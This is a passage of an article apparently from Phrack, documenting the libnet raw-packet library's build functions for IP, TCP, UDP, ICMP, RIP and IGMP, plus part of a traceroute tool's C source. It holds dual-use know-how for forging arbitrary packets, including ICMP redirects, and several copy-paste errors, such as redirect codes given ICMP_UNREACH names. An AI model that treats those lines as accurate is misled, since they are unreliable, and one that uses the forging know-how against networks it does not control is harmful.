+                    7 - pointer to packet payload
+                    8 - packet payload size
+                    9 - pointer to pre-allocated packet memory
+
+    libnet_build_dns() constructs a DNS packet.  The static DNS fields are
+    included as the first six arguments, but the optional variable length
+    fields must be included with the payload interface.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire DNS packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_ethernet(u_char *, u_char *, u_short, const u_char *, int,
+    u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to the destination address (string)
+                    2 - pointer to the source address (string)
+                    3 - ethernet packet type (symbolic constant)
+                    4 - pointer to packet payload
+                    5 - packet payload size
+                    6 - pointer to pre-allocated packet memory
+
+    libnet_build_ethernet() constructs an ethernet packet.  The destination
+    address and source address arguments are expected to be arrays of
+    unsigned character bytes.  The packet type should be one of the
+    following:
+
+    Value               Description
+    -------------------------------
+    ETHERTYPE_PUP       PUP protocol
+    ETHERTYPE_IP        IP protocol
+    ETHERTYPE_ARP       ARP protocol
+    ETHERTYPE_REVARP    Reverse ARP protocol
+    ETHERTYPE_VLAN      IEEE VLAN tagging
+    ETHERTYPE_LOOPBACK  Used to test interfaces
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ethernet
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_icmp_echo(u_char, u_char, u_short, u_short, const u_char *,
+    int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - packet id
+                    4 - packet sequence number
+                    5 - pointer to packet payload
+                    6 - packet payload size
+                    7 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_echo() constructs an ICMP_ECHO / ICMP_ECHOREPLY packet.
+    The packet type should be ICMP_ECHOREPLY or ICMP_ECHO and the code should
+    be 0.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_icmp_mask(u_char, u_char, u_short, u_short, u_long,
+    const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - packet id
+                    4 - packet sequence number
+                    5 - IP netmask
+                    6 - pointer to packet payload
+                    7 - packet payload size
+                    8 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_mask() constructs an ICMP_MASKREQ / ICMP_MASKREPLY
+    packet.  The packet type should be either ICMP_MASKREQ or ICMP_MASKREPLY
+    and the code should be 0.  The IP netmask argument should be a 32-bit
+    network-byte ordered subnet mask.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_icmp_unreach(u_char, u_char, u_short, u_char, u_short,
+    u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - original IP length
+                    4 - original IP TOS
+                    5 - original IP id
+                    6 - original IP fragmentation bits
+                    7 - original IP time to live
+                    8 - original IP protocol
+                    9 - original IP source address
+                    10 - original IP destination address
+                    11 - pointer to original IP payload
+                    12 - original IP payload size
+                    13 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_unreach() constructs an ICMP_UNREACH packet.  The 3rd
+    through the 12th arguments are used to build the IP header of the original
+    packet that caused the error message (the ICMP unreachable).  The packet
+    type should be ICMP_UNREACH and the code should be one of the following:
+
+    Value                           Description
+    -------------------------------------------
+    ICMP_UNREACH_NET                network is unreachable
+    ICMP_UNREACH_HOST               host is unreachable
+    ICMP_UNREACH_PROTOCOL           protocol is unreachable
+    ICMP_UNREACH_PORT               port is unreachable
+    ICMP_UNREACH_NEEDFRAG           fragmentation required but DF bit was set
+    ICMP_UNREACH_SRCFAIL            source routing failed
+    ICMP_UNREACH_NET_UNKNOWN        network is unknown
+    ICMP_UNREACH_HOST_UNKNOWN       host is unknown
+    ICMP_UNREACH_ISOLATED           host / network is isolated
+    ICMP_UNREACH_NET_PROHIB         network is prohibited
+    ICMP_UNREACH_HOST_PROHIB        host is prohibited
+    ICMP_UNREACH_TOSNET             IP TOS and network 
+    ICMP_UNREACH_TOSHOST            IP TOS and host
+    ICMP_UNREACH_FILTER_PROHIB      prohibitive filtering
+    ICMP_UNREACH_HOST_PRECEDENCE    host precedence
+    ICMP_UNREACH_PRECEDENCE_CUTOFF  host precedence cut-off
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_icmp_timeexceed(u_char, u_char, u_short, u_char, u_short,
+    u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - original IP length
+                    4 - original IP TOS
+                    5 - original IP id
+                    6 - original IP fragmentation bits
+                    7 - original IP time to live
+                    8 - original IP protocol
+                    9 - original IP source address
+                    10 - original IP destination address
+                    11 - pointer to original IP payload
+                    12 - original IP payload size
+                    13 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_timeexceed() contructs an ICMP_TIMEXCEED packet.  This
+    function is identical to libnet_build_icmp_unreach with the exception of
+    the packet type and code.  The packet type should be either
+    ICMP_TIMXCEED_INTRANS for packets that expired in transit (TTL expired) or
+    ICMP_TIMXCEED_REASS for packets that expired in the fragmentation
+    reassembly queue.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 is no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to the memory which is supposed to be pre-allocated points
+    to NULL.
+
+
+int libnet_build_icmp_redirect(u_char, u_char, u_long, u_short, u_char,
+    u_short, u_short, u_char, u_char, u_long, u_long, const u_char *, int,
+    u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - IP address of the gateway
+                    4 - original IP length
+                    5 - original IP TOS
+                    6 - original IP id
+                    7 - original IP fragmentation bits
+                    8 - original IP time to live
+                    9 - original IP protocol
+                   10 - original IP source address
+                   11 - original IP destination address
+                   12 - pointer to original IP payload
+                   13 - original IP payload size
+                   14 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_redirect() constructs an ICMP_REDIRECT packet.  This
+    function is similar to libnet_build_icmp_unreach, the differences being the
+    type and code and the addition of an argument to hold the IP address of the
+    gateway that should be used (hence the redirect). The packet type should be
+    ICMP_REDIRECT and the code should be one of the following:
+
+    Value                   Description
+    -----------------------------------
+    ICMP_UNREACH_NET        redirect for network
+    ICMP_UNREACH_HOST       redirect for host
+    ICMP_UNREACH_PROTOCOL   redirect for type of service and network
+    ICMP_UNREACH_PORT       redirect for type of service and host
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 is no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to the memory which is supposed to be pre-allocated points
+    to NULL.
+
+
+int libnet_build_icmp_timestamp(u_char, u_char, u_short, u_short, n_time,
+    n_time, n_time, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type (symbolic constant)
+                    2 - packet code (symbolic constant)
+                    3 - packet id
+                    4 - packet sequence number
+                    5 - originate timestamp
+                    6 - receive timestamp
+                    7 - transmit timestamp
+                    8 - pointer to packet payload
+                    9 - packet payload size
+                    10 - pointer to pre-allocated packet memory
+
+    libnet_build_icmp_timestamp() constructs an ICMP_TSTAMP / ICMP_TSTAMPREPLY
+    packet.  The packet type should be ICMP_TSTAMP or ICMP_TSTAMPREPLY and the
+    code should be 0.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 is no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to the memory which is supposed to be pre-allocated points
+    to NULL.
+
+
+int libnet_build_igmp(u_char type, u_char code, u_long ip, const u_char *,
+    int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet type
+                    2 - packet code
+                    3 - IP address
+                    4 - pointer to packet payload
+                    5 - packet payload size
+                    6 - pointer to pre-allocated packet memory
+
+    libnet_build_igmp() constructs an IGMP packet.  The packet type should be
+    one of the following:
+
+    Value                       Description
+    ---------------------------------------
+    IGMP_MEMBERSHIP_QUERY       membership query
+    IGMP_V1_MEMBERSHIP_REPORT   version 1 membership report
+    IGMP_V2_MEMBERSHIP_REPORT   version 2 membership report
+    IGMP_LEAVE_GROUP            leave-group message
+
+    The code, which is a routing sub-message, should probably be left to 0,
+    unless you know what you're doing.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer which points to memory which is supposed to be pre-allocated
+    points to NULL.
+
+
+int libnet_build_ip(u_short, u_char, u_short, u_short, u_char, u_char,
+    u_long, u_long, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet length (not including the IP header)
+                    2 - type of service (symbolic constant)
+                    3 - packet id
+                    4 - fragmentation bits (symbolic constant) / offset
+                    5 - time to live
+                    6 - protocol (symbolic constant)
+                    7 - source address
+                    8 - destination address
+                    9 - pointer to packet payload
+                    10 - packet payload size
+                    11 - pointer to pre-allocated packet memory
+
+    libnet_build_ip() constructs the mighty IP packet.  The fragmentation field
+    may be 0 or contain some combination of the following:
+
+    Value   Description
+    -------------------
+    IP_DF       Don't fragment this datagram (this is only valid when alone)
+    IP_MF       More fragments on the way (OR'd together with an offset value)
+
+    The IP_OFFMASK is used to retrieve the offset from the fragmentation field.
+
+    IP packets may be no larger than IP_MAXPACKET bytes.
+
+    The source and destination addresses need to be in network-byte order.
+
+    The payload interface should only be used to construct an arbitrary or
+    non-supported type IP datagram.  To construct a TCP, UDP, or similar
+    type packet, use the relevant libnet_build function.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to the memory which is supposed to be pre-allocated points
+    to NULL.
+
+
+int libnet_build_rip(u_char, u_char, u_short, u_short, u_short, u_long,
+    u_long, u_long, u_long, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - command (symbolic constant)
+                    2 - version (symbolic constant)
+                    3 - routing domain (or zero)
+                    4 - address family
+                    5 - route tag (or zero)
+                    6 - IP address
+                    7 - netmask (or zero)
+                    8 - next hop IP address (or zero)
+                    9 - metric
+                   10 - pointer to packet payload
+                   11 - packet payload size
+                   12 - pointer to pre-allocated packet memory
+
+    libnet_build_rip() constructs a RIP packet.  Depending on the version of
+    RIP you are using, packet fields are slightly different.  The following
+    chart highlights these differences:
+
+    Argument        Version 1       Version 2
+    -----------------------------------------
+    first           command         command
+    second          RIPVER_1        RIPVER_2
+    third           zero            routing domain
+    fourth          address family  address family
+    fifth           zero            route tag
+    sixth           IP address      IP address
+    seventh         zero            subnet mask
+    eighth          zero            next hop IP
+    ninth           metric          metric
+
+    The RIP commands should be one of the following:
+
+    Value               Description
+    -------------------------------
+    RIPCMD_REQUEST      RIP request
+    RIPCMD_RESPONSE     RIP response
+    RIPCMD_TRACEON      RIP tracing on
+    RIPCMD_TRACEOFF     RIP tracing off
+    RIPCMD_POLL         RIP polling
+    RIPCMD_POLLENTRY
+    RIPCMD_MAX
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer that points to memory which is supposed to be pre-allocated
+    points to NULL.
+
+
+int libnet_build_tcp(u_short, u_short, u_long, u_long, u_char, u_short,
+    u_short, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - source port
+                    2 - destination port
+                    3 - sequence number
+                    4 - acknowledgement number
+                    5 - control flags (symbolic constant)
+                    6 - window size
+                    7 - urgent pointer
+                    8 - pointer to packet payload
+                    9 - packet payload size
+                    10 - pointer to pre-allocated packet memory
+
+    libnet_build_tcp() constructs a TCP packet.  The control flags should be
+    one or more of the following (OR'd together if need be):
+
+    Value   Description
+    -----------------------
+    TH_URG  urgent data is present
+    TH_ACK  acknowledgement number field should be checked
+    TH_PSH  push this data to the application as soon as possible
+    TH_RST  reset the referenced connection
+    TH_SYN  synchronize sequence numbers
+    TH_FIN  finished sending data (sender)
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_udp(u_short, u_short, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - source port
+                    2 - destination port
+                    3 - pointer to packet payload
+                    4 - packet payload size
+                    5 - pointer to pre-allocated packet memory
+
+    libnet_build_udp() constructs a UDP packet.  Please remember that UDP
+    checksums are considered mandatory by the host requirements RFC.
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 if no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ICMP_ECHO
+    packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the pointer to memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_insert_ipo(struct ipoption *opt, u_char opt_len, u_char *buf);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to an IP options structure (filled in)
+                    2 - length of the options
+                    3 - pointer to a complete IP datagram
+
+    libnet_insert_ipo() inserts IP options into a pre-built IP packet.
+    Supplied is a pointer to an ip options structure, the size of this options
+    list, and a pointer the pre-built packet.  The options list should be
+    constructed as they will appear on the wire, as they are simply inserted
+    into the packet at the appropriate location.
+
+    The function returns -1 if the options would result in packet too large
+    (greater then 65535 bytes), or if the packet buffer is NULL.  It is an
+    unchecked runtime error for the user to have not allocated enough heap
+    memory for the IP packet plus the IP options.
+
+
+int libnet_insert_tcpo(struct tcpoption *, u_char, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to an TCP options structure (filled in)
+                    2 - length of the options
+                    3 - pointer to a complete TCP packet
+
+    libnet_insert_tcpo() inserts TCP options into a pre-built IP/TCP packet.
+    Supplied is a pointer to a tcp options structure, the size of this options
+    list, and a pointer the pre-built packet.  The options list should be
+    constructed as they will appear on the wire, as they are simply inserted
+    into the packet at the appropriate location.
+
+    The function returns -1 if the options would result in packet too large
+    (greater then 65535 bytes), if the packet isn't an IP/TCP packet, if the
+    options list if longer than 20 bytes, or if the packet buffer is NULL.  It
+    is an unchecked runtime error for the user to have not allocated enough
+    heap memory for the IP/TCP packet plus the IP options.
+
+
+Support Functions
+-----------------
+
+int libnet_seed_prand();
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      NA
+
+    libnet_seed_prand() seeds the pseudo-random number generator.  The function
+    is basically a wrapper to srandom.  It makes a call to gettimeofday to get 
+    entropy.  It can return -1 if the call to gettimeofday fails (check errno).
+    It otherwise returns 1.
+
+u_long libnet_get_prand(int);
+
+    RV on success:  1
+    RV on failure:  NA
+    Reentrant:      yes
+    Arguments:      1 - maximum size of pseudo-random number desired (symbolic
+                        constant)
+
+    libnet_get_prand() generates a psuedo-random number.  The range of the 
+    returned number is controlled by the function's only argument:
+
+    Value   Description
+    -------------------
+    PR2     0 - 1
+    PR8     0 - 255
+    PR16    0 - 32767
+    PRu16   0 - 65535
+    PR32    0 - 2147483647
+    PRu32   0 - 4294967295
+
+    The function does not fail.
+
+
+void libnet_hex_dump(u_char *buf, int len, int swap, FILE *stream);
+
+    RV on success:  NA
+    RV on failure:  NA
+    Reentrant:      yes
+    Arguments:      1 - packet to dump
+                    2 - packet length
+                    3 - byte swap flag
+                    4 - previously opened stream to dump to the packet to
+
+    libnet_hex_dump() prints out a packet in hexadecimal.  It will print the
+    packet as it appears in memory, or as it will appear on the wire,
+    depending on the value of the byte-swap flag.
+
+    The function prints the packet to a previously opened stream (such as
+    stdout).
+
+    Note that on big-endian architectures such as Solaris, the packet will
+    appear the same in memory as it will on the wire.
+
+
+int libnet_plist_chain_new(struct libnet_plist_chain **, char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to a libnet_plist_chain pointer
+                    2 - pointer to the token list
+
+    libnet_plist_chain_new() constructs a new libnet port-list chain.  A libnet
+    port-list chain is a fast and simple way of implementing port-list ranges
+    (useful for applications that employ a list of ports - like a port scanner).
+    You'll see naive implementations that allocate an entire array of 65535
+    bytes and fill in the desired ports one by one.  However, we only really
+    need to store the beginning port and the ending port, and we can
+    efficiently store multiple port ranges (delimited by commas) by using a
+    linked list chain with each node holding the beginning and ending port for
+    a particular range.  For example, The port range `1-1024` would occupy
+    one node with the beginning port being 1 and the ending port being 1024.
+    The port range `25,110-161,6000` would result in 3 nodes being allocated.
+    Single ports are taken as single ranges (port 25 ends up being 25-25).
+    A port list range without a terminating port (port_num - ) is
+    considered shorthand for (port_num - 65535).
+
+    The arguments are a pointer to libnet_plist_chain pointer (which will end
+    up being the head of the linked list) which needs to deference an allocated
+    libnet_plist_chain structure and pointer to the port-list (token-list)
+    itself.
+
+    The function checks this character port list for valid tokens
+    (1234567890,- ) and returns an error if an unrecognized token is
+    found.
+
+    Upon success the function returns 1, and head points to the newly formed
+    port-list (and also contains the number of nodes in the list.  If an error
+    occurs (an unrecognized token is found or malloc fails) -1 is returned and
+    head is set to NULL.
+
+    libnet_plist_chain_next_pair() should be used to extract port list pairs.
+
+
+int libnet_plist_chain_next_pair(struct libnet_plist_chain *, u_short *,
+    u_short *);
+
+    RV on success:  1, 0
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to a libnet_plist_chain pointer
+                    2 - pointer to the beginning port (to be filled in)
+                    3 - pointer to the ending port (to be filled in)
+
+
+    libnet_plist_chain_next_pair() fetches the next pair of ports from the
+    list.  The function takes a pointer to the head of the prebuilt list and a
+    pointer to a u_short that will contain the beginning port and a pointer to
+    a u_short that will contain the ending port.
+
+    The function returns 1 and fills in these values if there are nodes
+    remaining, or if the port list chain is exhausted, it returns 0.  If
+    an error occurs (the libnet_plist_chain pointer is NULL) the function
+    returns -1.
+
+
+int libnet_plist_chain_dump(struct libnet_plist_chain *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to a libnet_plist_chain pointer
+
+    libnet_plist_chain_dump() dumps the port-list chain referenced by the
+    argument.  The function prints the list to stdout (it's mainly meant as a
+    debugging tool).  It returns 1 upon success or if an error occurs (the
+    libnet_plist_chain pointer is NULL) the function returns -1.
+
+
+u_char *libnet_plist_chain_dump_string(struct libnet_plist_chain *);
+
+    RV on success:  pointer to the token list as a string
+    RV on failure:  NULL
+    Reentrant:      no
+    Arguments:      1 - pointer to a libnet_plist_chain pointer
+
+    libnet_plist_chain_dump_string() returns the port-list chain referenced by
+    the argument as a string.  It returns the port list string upon success or
+    if an error occurs (the libnet_plist_chain pointer is NULL) the function
+    returns NULL.
+
+
+void libnet_plist_chain_free(struct libnet_plist_chain *);
+
+    RV on success:  NA
+    RV on failure:  NA
+    Reentrant:      yes
+    Arguments:      1 - pointer to a libnet_plist_chain pointer
+
+    libnet_plist_chain_free() frees the memory associated with the libnet
+    port list chain.
+
+
+----[ 6]  Conclusion
+
+Libnet is a powerful and useful library.  Use it well and you will prosper
+and people will like you.  Women will want you, men will want to be you (swap
+genders as required).
+
+
+----[ 7]  URLs
+
+    Libnet Homepage:        http://www.packetfactory.net/libnet
+    Libnet Project Page:    http://www.packetfactory.net
+    Libnet Mailing List:    libnet-subscribe@libnetdevel.com
+                            (mailing list is, as of 09.09.99 down for unknown
+                             reasons.  It will be back up soon.  Keep track of
+                             it on the webpage.)
+    TracerX                 http://www.packetfactory.net/tracerx
+
+
+----[ 8]  References
+
+    [1] LBNL, Network Research Group, "libpcap", http://ee.lbl.gov
+    [2] Stevens, W. Richard, "UNIX Network Programming, vol. I, 2nd ed.",
+        Prentice Hall PTR, 1998
+    [3] Hanson, David R., "C Interfaces and Implementations", Addison-Wesley,
+        1997
+
+
+----[ 9]  Example code
+
+No writ on a C library would be complete without C code.  The following
+heavily commented example is a work in progress.  It's actually an
+incomplete
+program that we were working on called tracerx (a planned enhanced
+traceroute -- http://www.packetfactory.net/tracerx).
+
+The packet injection portion is complete and operational and
+should prove to be a good example of how to write reasonably complex code
+on top of libnet (and libpcap).  Included is the current tracerx tree
+including the autoconf files such that you can build it on your machine
+and play with it.
+
+<++> P55/Tracerx/tx_framework.c !a2064076
+/*
+ *  $Id: tx_framework.c,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_framework.c - main tracerx toplevel routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_main.h"
+#include "./tx_error.h"
+#include "./tx_struct.h"
+#include "./tx_framework.h"
+#include "./tx_packet_inject.h"
+#include "./tx_packet_capture.h"
+#include "./tx_packet_filter.h"
+
+
+int
+tx_init_control(struct tx_control **tx_c)
+{
+    /*
+     *  Heap memory for the control structure.
+     */
+    *tx_c = (struct tx_control *)malloc(sizeof(struct tx_control));
+    if (!(*tx_c))
+    {
+        return (-1);
+    }  
+
+    /*
+     *  Heap memory for the libnet link interface structure.
+     */
+    (*tx_c)->l =
+        (struct libnet_link_int *)malloc(sizeof(struct libnet_link_int));
+    if (!((*tx_c)->l))
+    {
+        return (-1);
+    }
+
+    if (libnet_seed_prand() == -1)
+    {
+        tx_error(CRITICAL, "Can't initialize the random number generator\n");
+        return (-1);
+    }
+
+    /*
+     *  Initialize defaults to mimic a standard traceroute scan.
+     */
+    (*tx_c)->device         = NULL;             /* set later */
+    (*tx_c)->current_ttl    = 1;                /* start at 1 hop */
+    (*tx_c)->max_ttl        = 30;               /* end at 30 */
+    (*tx_c)->initial_sport  = libnet_get_prand(PRu16);
+    (*tx_c)->initial_dport  = 32768 + 666;      /* standard tr */
+    (*tx_c)->id             = getpid();         /* packet id */
+    (*tx_c)->use_name       = 1;                /* resolve IP addresses */
+    (*tx_c)->packet_size    = PACKET_MIN;       /* IP + UDP + payload */
+    (*tx_c)->ip_tos         = 0;                /* set later */
+    (*tx_c)->ip_df          = 0;                /* set later */
+    (*tx_c)->packet_offset  = 0;                /* set later */
+    (*tx_c)->protocol       = IPPROTO_UDP;      /* UDP */
+    (*tx_c)->probe_cnt      = 3;                /* 3 probes */
+    (*tx_c)->verbose        = 0;                /* Sssssh */
+    (*tx_c)->reading_wait   = 5;                /* 5 seconds */
+    (*tx_c)->writing_pause  = 0;                /* no writing pause */
+    (*tx_c)->host           = 0;                /* set later */
+    (*tx_c)->packets_sent   = 0;                /* set later */
+    (*tx_c)->packets_reply  = 0;                /* set later */
+    (*tx_c)->l              = NULL;             /* pcap descriptor */
+    (*tx_c)->p              = NULL;             /* libnet descriptor */
+    memset(&(*tx_c)->sin, 0, sizeof(struct sockaddr_in));
+
+    return (1);
+}
+
+
+int
+tx_init_network(struct tx_control **tx_c, char *err_buf)
+{
+    /*
+     *  Set up the network interface and determine our outgoing IP address.
+     */
+    if (libnet_select_device(&(*tx_c)->sin, &(*tx_c)->device, err_buf) == -1)
+    {
+        return (-1);
+    }
+
+    /*
+     *  Open the libnet link-layer injection interface.
+     */
+    (*tx_c)->l = libnet_open_link_interface((*tx_c)->device, err_buf);
+    if (!((*tx_c)->l))
+    {
+        return (-1);
+    }
+
+    /*
+     *  Open the pcap packet capturing interface.
+     */
+    (*tx_c)->p = pcap_open_live((*tx_c)->device, PCAP_BUFSIZ, 0, 500, err_buf);
+    if (!((*tx_c)->p))
+    {
+        return (-1);
+    }
+
+    /*
+     *  Verify minimum packet size and set the pcap filter.
+     */
+    switch ((*tx_c)->protocol)
+    {
+        case IPPROTO_UDP:
+            if ((*tx_c)->packet_size < IP_H + UDP_H + TX_P)
+            {
+                tx_error(WARNING,
+                    "Packet size too small, adjusted from %d to %d\n",
+                    (*tx_c)->packet_size,
+                    IP_H + UDP_H + TX_P);
+                (*tx_c)->packet_size = IP_H + UDP_H + TX_P;
+            }
+            if (tx_set_pcap_filter(TX_BPF_FILTER_UDP, tx_c) == -1)
+            {
+                return (-1);
+            }
+            break;
+        case IPPROTO_TCP:
+            if ((*tx_c)->packet_size < IP_H + TCP_H + TX_P)
+            {
+                tx_error(WARNING,
+                    "Packet size too small, adjusted from %d to %d\n",
+                    (*tx_c)->packet_size,
+                    IP_H + TCP_H + TX_P);
+                (*tx_c)->packet_size = IP_H + TCP_H + TX_P;
+            }
+            if (tx_set_pcap_filter(TX_BPF_FILTER_TCP, tx_c) == -1)
+            {
+                return (-1);
+            }
+            break;
+        case IPPROTO_ICMP:
+            if ((*tx_c)->packet_size < IP_H + ICMP_ECHO_H + TX_P)
+            {
+                tx_error(WARNING,
+                    "Packet size too small, adjusted from %d to %d\n",
+                    (*tx_c)->packet_size,
